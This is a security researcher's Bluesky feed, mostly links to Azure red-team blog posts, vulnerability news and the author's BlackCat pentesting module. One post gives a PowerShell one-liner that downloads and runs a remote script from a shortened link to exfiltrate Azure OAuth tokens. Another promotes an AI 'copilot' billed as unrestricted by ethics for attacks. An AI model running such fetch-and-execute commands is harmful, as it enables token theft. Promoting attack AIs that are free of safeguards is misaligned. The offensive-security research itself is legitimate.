Sign in

Rogier Dijkman | MVP

@rogierdijkman.bsky.social
527 followers 78 following 52 posts

🔐 Security Researcher | Marathon Runner | Author | IaC | #GitHub | #PowerShell | #Azure #Bicep | #Copilot

PostsRepliesMedia
Rogier Dijkman | MVP @rogierdijkman.bsky.social · 30/06/2026
O-oh llama Exposed - Local models leaked azurehacking.com/post/o-oh-ll...
azurehacking.com
Azure Hacking Security Blog
Azure Hacking research: Entra ID, cloud identity security, offensive techniques & detection.
100
Rogier Dijkman | MVP @rogierdijkman.bsky.social · 01/04/2026
Azure API Connections: A Red Team Deep Dive azurehacking.com/post/azure-a...
azurehacking.com
Azure API Connections: A Red Team Deep Dive
Azure API Connections are silently stored bearer tokens, service principal secrets, and OAuth refresh tokens that sit in plain-ARM sight, and any attacker with Microsoft.Web/connections/listConnection...
000
Rogier Dijkman | MVP @rogierdijkman.bsky.social · 23/03/2026
In-flight Wi-Fi security doesn't get much attention, but Delta's captive portal exposes passengers to account takeover, token forgery, and an end-of-life API gateway riddled with unpatched CVEs. We audited it from the comfort of seat 30C. azurehacking.com/post/in-flig...
azurehacking.com
In-Flight Wi-Fi Security Audit: Delta Leaves SkyMiles Exposed at 35,000 Feet
In-flight Wi-Fi security doesn't get much attention, but Delta's captive portal exposes passengers to account takeover, token forgery, and an end-of-life API gateway riddled with unpatched CVEs. We au...
021
Rogier Dijkman | MVP @rogierdijkman.bsky.social · 25/02/2026
Azure Tenant Takeover: From Exposed Config to Global Admin azurehacking.com/post/azure-t...
azurehacking.com
Azure Tenant Takeover: From Exposed Config to Global Admin
A soft-deleted file in a public blob container, still retrievable through versioning, leaks a SAS token that exposes an entire file share, ultimately cascading into a complete Azure tenant takeover th...
010
Rogier Dijkman | MVP @rogierdijkman.bsky.social · 17/02/2026
🏴‍☠️ 𝗡𝗲𝘄 𝗣𝗢𝗖: 𝗙𝗲𝗱𝗲𝗿𝗮𝘁𝗲𝗱 𝗜𝗱𝗲𝗻𝘁𝗶𝘁𝘆 𝗖𝗿𝗲𝗱𝗲𝗻𝘁𝗶𝗮𝗹 𝗶𝗻𝗷𝗲𝗰𝘁𝗶𝗼𝗻 This POC shows how you can inject a federated credential on a UAMI, mint a Graph token in less than ~5s without any infrastructure setup! azurehacking.com/post.html?sl...
010
Rogier Dijkman | MVP @rogierdijkman.bsky.social · 07/02/2026
Getting Started with the BlackCat PowerShell Module azurehacking.com/post.html?sl...
azurehacking.com
Loading… | AzureHacking Security Blog
021
Rogier Dijkman | MVP @rogierdijkman.bsky.social · 17/10/2025
Had a great time presenting “Hacking Azure” with #BlackCat at @mc2mc.be. Thank you to @Savaco for providing such an excellent location. I’m finalizing the slides, recording short videos, and updating the walkthrough so attendees can easily revisit the steps demonstrated.
011
Rogier Dijkman | MVP @rogierdijkman.bsky.social · 02/08/2025
Traveling through Florida for three weeks this summer. I am getting crazy of all the waivers that needs to be signed everywhere. I wouldn’t be surprised if I need to sign a waiver if you need to fart next time.
000
Rogier Dijkman | MVP @rogierdijkman.bsky.social · 16/03/2025
That was fun spending of my Sunday afternoon. Working on ways to create persistence in Azure on a place where you wouldn't expect it. If you never look away, you will only see what happens in front of you.
010
Rogier Dijkman | MVP @rogierdijkman.bsky.social · 06/03/2025
Operating the camera 📷 at the #YellowHat event at @Microsoft
020
Rogier Dijkman | MVP @rogierdijkman.bsky.social · 19/02/2025
Are you looking for a malcious Copilot that is not restricted to ethics and is willing to be your wingman during cyber attacks? Check app.whiterabbitneo.com
app.whiterabbitneo.com
WhiteRabbitNeo - Your cybersecurity co-pilot
WhiteRabbitNeo is an AI company focused on cybersecurity.
000
Rogier Dijkman | MVP @rogierdijkman.bsky.social · 15/02/2025
www.crowdstrike.com/en-us/blog/c...
crowdstrike.com
CrowdStrike University Fast Track Fuels Cybersecurity Training
CrowdStrike customers now have access to no-cost fundamentals training for world-class cybersecurity education. Learn more!
000
Rogier Dijkman | MVP @rogierdijkman.bsky.social · 12/02/2025
🚨AzTokenDumpr 🚨 I have created a PoC to quickly exfiltrate #Microsoft #Azure oAuth Tokens from PowerShell. no installation required! run: PS> iex (irm bit.ly/blct-token)
030
Rogier Dijkman | MVP @rogierdijkman.bsky.social · 07/02/2025
github.blog/changelog/20...
github.blog
Google Gemini 2.0 Flash is now available to all Copilot users in public preview · GitHub Changelog
Google Gemini 2.0 Flash is now available to all Copilot users in public preview
000
Rogier Dijkman | MVP @rogierdijkman.bsky.social · 04/02/2025
In this article, we will walk through a solution that leverages GitHub Actions to automate the process of adding new members to a GitHub organization.
rogierdijkman.medium.com
Self-Service Membership for GitHub Organizations
In this article, we will walk through a solution to automate the process of adding new members to a GitHub organization
030
Rogier Dijkman | MVP @rogierdijkman.bsky.social · 30/01/2025
The Clone2Leak vulnerability involves the improper handling of messages in the Git Credential Protocol within GitHub Desktop and Git Credential Manager. This means that an attacker could potentially gain access to your Git credentials, posing a significant security flatt.tech/research/pos...
flatt.tech
Clone2Leak: Your Git Credentials Belong To Us
Introduction Hello, I’m RyotaK ( @ryotkak ), a security engineer at GMO Flatt Security Inc. In October 2024, I was hunting bugs for the GitHub Bug Bounty program. After investigating GitHub Enterprise...
000
Rogier Dijkman | MVP @rogierdijkman.bsky.social · 28/01/2025
In this article, I'm excited to introduce a project I've been working on to securely share secrets using only Azure resources. rogierdijkman.medium.com/self-hosted-...
rogierdijkman.medium.com
Self-hosted password solution in Azure
In this article, I’m excited to introduce a project I’ve been working on to securely share secrets using only Azure resources.
021
Rogier Dijkman | MVP @rogierdijkman.bsky.social · 24/01/2025
🚨 ANNOUNCEMENT🚨 I'm excited to announce the start of the "GitHub Lowlands" user group! 🤩 This is going to be awesome for connecting with others and stay up-date on everything about GitHub. @github.com @arthurvandijk.bsky.social #github #copilot #community
010
Rogier Dijkman | MVP @rogierdijkman.bsky.social · 15/01/2025
🚨 New Blog Alert! 🚨 In this article, I delve into the recent brute force campaign leveraging the 'fasthttp library' to target Azure Active Directory (AAD) accounts. Learn how to detect these attacks using Kusto Query Language (KQL) in Microsoft Defender
rogierdijkman.medium.com
Detecting ‘fasthttp’ bruteforce attacks on Entra ID
In this blog post, I will explain how to detect brute force attacks using Kusto Query Language (KQL) in Microsoft Defender. I will provide…
010
Rogier Dijkman | MVP @rogierdijkman.bsky.social · 15/01/2025
www.speartip.com/fasthttp-use... **Monitor Logs**: Regularly inspect audit logs for FastHTTP user agents to detect suspicious activity.
speartip.com
fasthttp Used in New Bruteforce Campaign
SpearTip Security Operations Center, together with the SaaS Alerts team, identified an emerging threat involving the fastHTTP library
000
Rogier Dijkman | MVP @rogierdijkman.bsky.social · 14/01/2025
🚨 **Patch Alert!** 🚨 Microsoft’s January 2025 Patch Tuesday is here, and it’s packed with security updates! 🛡️ 👉 Check out the full scoop here: [Microsoft January 2025 Patch Tuesday](www.cyberkendra.com/2025/01/micr...) 🚀 #CyberSecurity #WindowsUpdate Ready to dive into the details? 💻🔧🔍
cyberkendra.com
Microsoft January 2025 Patch Tuesday Fixes 159 Flaws with 8 Zero-days
Windows 11 with KB5050009, KB5050021 and Windows 10 with KB5049981, KB5050008, KB5049993, KB5050013
000
Rogier Dijkman | MVP @rogierdijkman.bsky.social · 08/01/2025
Having fun with Microsoft Azure Working on a fun little PoC project to securely share a password or secret and destroy it after it has been fetched. Using a FunctionApp and KeyVault
020
Rogier Dijkman | MVP @rogierdijkman.bsky.social · 06/01/2025
I have created a nice little script as bart of project #blackcat to quickly dump all Azure #oAuth tokens based on the current context and export them to a file for exfiltration purposes. github.com/azurekid/bla...
github.com
blackcat/src/Public/generic/Export-AccessTokens.ps1 at main · azurekid/blackcat
Contribute to azurekid/blackcat development by creating an account on GitHub.
120
Rogier Dijkman | MVP @rogierdijkman.bsky.social · 04/01/2025
coinbase.com/join/JCCM3ER...
coinbase.com
Start trading on Coinbase using this link and get 10 EUR in BTC.
Coinbase is a secure online platform for buying, selling, transferring, and storing cryptocurrency.
000
Rogier Dijkman | MVP @rogierdijkman.bsky.social · 18/12/2024
WoW, this is awesome! GitHub Copilot now offers a free tier github.com/login?return...
020
Rogier Dijkman | MVP @rogierdijkman.bsky.social · 17/12/2024
Kali Linux 2024.4 released with 14 new tools, deprecates some features www.kali.org/blog/kali-li... #Security
kali.org
Kali Linux 2024.4 Release (Python 3.12, Goodbye i386, Raspberry Pi Imager & Kali NetHunter) | Kali Linux Blog
Just before the year starts to wrap up, we are getting the final 2024 release out! This contains a wide range of updates and changes, which are in already in effect, ready for immediate download, or u...
011
Rogier Dijkman | MVP @rogierdijkman.bsky.social · 12/12/2024
posts.specterops.io/unwrapping-b...
posts.specterops.io
Unwrapping BloodHound v6.3 with Impact Analysis
Just in time for the holidays, sharper tools for faster defense
000
Rogier Dijkman | MVP @rogierdijkman.bsky.social · 11/12/2024
Researchers cracked a Microsoft Azure method for multifactor authentication (MFA) in about an hour www.oasis.security/resources/bl... #Microsoft #Security #MFA
oasis.security
Oasis Security Research Team Discovers Microsoft Azure MFA Bypass
Critical vulnerability could have allowed malicious actors to gain unauthorized access to users’ Microsoft accounts.
272
Rogier Dijkman | MVP @rogierdijkman.bsky.social · 11/12/2024
Whoop! Patch Tuesday had some interesting stuff. What was keeping you awake? www.darkreading.com/application-...
darkreading.com
Microsoft Fixes Zero-Day, Critical RCEs in Patch Tuesday
The zero-day (CVE-2024-49138), plus a worryingly critical unauthenticated RCE security vulnerability (CVE-2024-49112), are unwanted gifts for security admins this season.
000
Rogier Dijkman | MVP @rogierdijkman.bsky.social · 04/12/2024
thehackernews.com/2024/12/crit...
thehackernews.com
Critical SailPoint IdentityIQ Vulnerability Exposes Files to Unauthorized Access
Critical CVE-2024-10905 in SailPoint's IdentityIQ (CVSS 10.0) risks unauthorized file access. Update now
000
Rogier Dijkman | MVP @rogierdijkman.bsky.social · 03/12/2024
In today's "Learn to Red Team AI Systems using PyRIT" using PyRIT to find high-quality bugs in generative AI systems. If you missed the live session, you can watch the recording here: youtu.be/jq9DcEL3cHE?... ▶️PyRIT: github.com/Azure/PyRIT
youtu.be
Zero Day Quest - Learn to Red Team AI Systems Using PyRIT. Recorded December 2nd 2024
YouTube video by Microsoft Security Response Center (MSRC)
010
Rogier Dijkman | MVP @rogierdijkman.bsky.social · 28/11/2024
www.microsoftrnd.co.il/bluehatil/co...
000
Rogier Dijkman | MVP @rogierdijkman.bsky.social · 26/11/2024
blog.fndsec.net/2024/11/25/s... #Security #PowerShell #Identity
blog.fndsec.net
ShadowHound: A SharpHound Alternative Using Native PowerShell
ShadowHound is a PowerShell tool designed for mapping Active Directory environments without using known malicious binaries. It utilizes legitimate PowerShell modules for data collection through two…
031
Rogier Dijkman | MVP @rogierdijkman.bsky.social · 24/11/2024
Cross-IdP impersonation: Hijacking SSO to access downstream apps pushsecurity.com/blog/cross-i...
pushsecurity.com
Cross-IdP impersonation: hijacking SSO using fraudulent IdPs
Cross-IdP impersonation is a method of hijacking SSO to access downstream apps — without needing to compromise accounts on your company’s main IdP.
010
Rogier Dijkman | MVP @rogierdijkman.bsky.social · 22/11/2024
Having fun with putting payloads in a TXT records to trigger ASCII Art in the terminal. Next will be some ANSI Escape code magic and tampering with Azure DNS. #security
1160
Rogier Dijkman | MVP @rogierdijkman.bsky.social · 22/11/2024
Working this weekend on my Azure pentesting PowerShell Module #BlackCat If you have any suggestions or would like to contribute, sent me a PM 🏴
020
Rogier Dijkman | MVP @rogierdijkman.bsky.social · 22/11/2024
NTLM Privilege Escalation: The Unpatched Microsoft Vulnerabilities No One is Talking About #EoP #Security #Microsoft blog.morphisec.com/5-ntlm-vulne...
blog.morphisec.com
NTLM Privilege Escalation: The Unpatched Microsoft Vulnerabilities No One is Talking About
NTLM attacks on Microsoft products show flaws that Microsoft won't patch. Learn about these risks and why disclosure matters.
010
Rogier Dijkman | MVP @rogierdijkman.bsky.social · 21/11/2024
www.bleepingcomputer.com/news/securit... #security #bluesky
bleepingcomputer.com
Now BlueSky hit with crypto scams as it crosses 20 million users
As users are flocking to BlueSky from social media platforms like X/Twitter, so are threat actors. BleepingComputer has spotted cryptocurrency scams popping up on BlueSky just as the decentralized mic...
010
Rogier Dijkman | MVP @rogierdijkman.bsky.social · 19/11/2024
A comprehensive collection of publicly disclosed exploits for Local Privilege Escalation (LPE) vulnerabilities affecting Microsoft Windows operating systems github.com/MzHmO/Exploi... #Microsoft #Security #Vulnerability #EoP
github.com
GitHub - MzHmO/Exploit-Street: Complete list of LPE exploits for Windows (starting from 2023)
Complete list of LPE exploits for Windows (starting from 2023) - MzHmO/Exploit-Street
020
Rogier Dijkman | MVP @rogierdijkman.bsky.social · 18/11/2024
We’re only a few clicks away before Microsoft Ignite, where the brightest minds come together to innovate, inspire, and ignite the future! 🔥 Don’t miss out on this opportunity to learn from industry leaders, explore technology, and connect with a global community of tech enthusiasts.
070
Rogier Dijkman | MVP @rogierdijkman.bsky.social · 13/11/2024
newtonpaul.com/tunneling-c2...
newtonpaul.com
Microsoft Dev Tunnels: Tunnelling C2 and More - On The Hunt
Attackers can use Microsoft Dev Tunnels as a means of tunnelling C2 traffic through legitimate Microsoft infrastructure undetected.
000
Rogier Dijkman | MVP @rogierdijkman.bsky.social · 11/11/2024
Microsoft BlueHat recordings! It has really great content 🔥 youtube.com/playlist?lis...
youtube.com
BlueHat 2024 - YouTube
BlueHat 2024 - Oct 29-30, 2024. Redmond, WA USA
010
Rogier Dijkman | MVP @rogierdijkman.bsky.social · 11/11/2024
perception-point.io/blog/phishin... #security #microsoft
perception-point.io
Phishing by Design: Two-Step Attacks Using Microsoft Visio Files | Perception Point
A new type of two-step phishing attack leverages Microsoft Visio files (.vsdx) and SharePoint to evade detection and steal credentials.
064
Rogier Dijkman | MVP @rogierdijkman.bsky.social · 10/11/2024
Now we can start building advanced detections based on the Security Copilot Audit logs. But also create loops 🤔 bit.ly/4ejNqoz #security #copilot
bit.ly
Access the Security Copilot audit log
Learn how to access the Security Copilot audit log
010
Rogier Dijkman | MVP @rogierdijkman.bsky.social · 10/11/2024
xybytes.com/azure/Azure-...
xybytes.com
Azure Application Proxy Hijacking
Azure Application Proxy offers a groundbreaking solution for remote users needing access to on-premises web applications. By integrating seamlessly with Microsoft Entra ID for one-time sign-on, it sim...
010
Rogier Dijkman | MVP @rogierdijkman.bsky.social · 09/11/2024
cloudtips.nl/maester-micr...
cloudtips.nl
Maester — Microsoft Security Test Automation Framework
Maester is a PowerShell based Microsoft Security test automation framework designed to help you maintain control over your Microsoft…
073
Rogier Dijkman | MVP @rogierdijkman.bsky.social · 07/11/2024
www.cyberkendra.com/2024/11/micr...
cyberkendra.com
Microsoft Notepad is Getting AI Integration Called - Rewrite
010
Rogier Dijkman | MVP @rogierdijkman.bsky.social · 01/11/2024
cyble.com/blog/it-vuln... #security #vulnerability @fortinet.bsky.social @grafana.bsky.social
cyble.com
IT Vulnerability Report: Fortinet, SonicWall, Grafana Exposures Top 1 Million - Cyble
Cyble’s weekly IT vulnerability report highlights vulnerabilities in Fortinet, SonicWall, Grafana Labs, CyberPanel and more.
000
Rogier Dijkman | MVP @rogierdijkman.bsky.social · 31/10/2024
Microsoft has published this blog on how covert networks are used in attacks, with the goal of increasing awareness, improving defenses, and disrupting related activity against our customers. www.microsoft.com/en-us/securi...
microsoft.com
Chinese threat actor Storm-0940 uses credentials from password spray attacks from a covert network | Microsoft Security Blog
Since August 2023, Microsoft has observed intrusion activity targeting and successfully stealing credentials from multiple Microsoft customers that is enabled by highly evasive password spray attacks....
010
Rogier Dijkman | MVP @rogierdijkman.bsky.social · 29/10/2024
Exchange Online Inbound DANE with DNSSEC is now Public Available 🥳 🎉 techcommunity.microsoft.com/t5/exchange-...
020